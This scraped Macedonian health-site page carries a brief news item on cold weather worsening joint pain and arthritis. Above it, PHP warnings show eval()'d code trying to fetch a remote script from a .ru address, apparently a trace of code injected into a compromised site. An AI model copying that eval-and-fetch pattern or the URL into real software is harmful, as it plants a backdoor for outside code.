Ладното време може да ја влоши болката во зглобовите | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

РЕВМАТОЛОГИЈА

                           
                           
                           
                       

Ладното време може да ја влоши болката во зглобовите

Луѓето кои што страдаат од болки во зглобовите треба да внимаваат добро да се облечат бидејќи ладното време може да ја влоши болката, се вели во новото научно истражување.


Иако резултатите од истражувањето не се конечни, се смета дека влошувањето на симптомите во зима може едноставно да биде причинето поради намалената физичка активност и подолгото престојување во домот за време на зимските месеци.Иако вежбањето може да биде многу тешко кога имате болка, сепак, вежбите со глуждовите, рамењата и главата може да помогне.Околу 10% од светската популација има проблеми со артритисот, при што најчестите форми се остеоартритис (дегенеративна форма на болест на зглобовите) и ревматоидниот артритис кој што претставува автоимуно заболување каде што имуниот систем на човекот по грешка ги напаѓа зглобовите.Автор: За Здравје

ЗА ЗДРАВЈЕ NEWSLETTER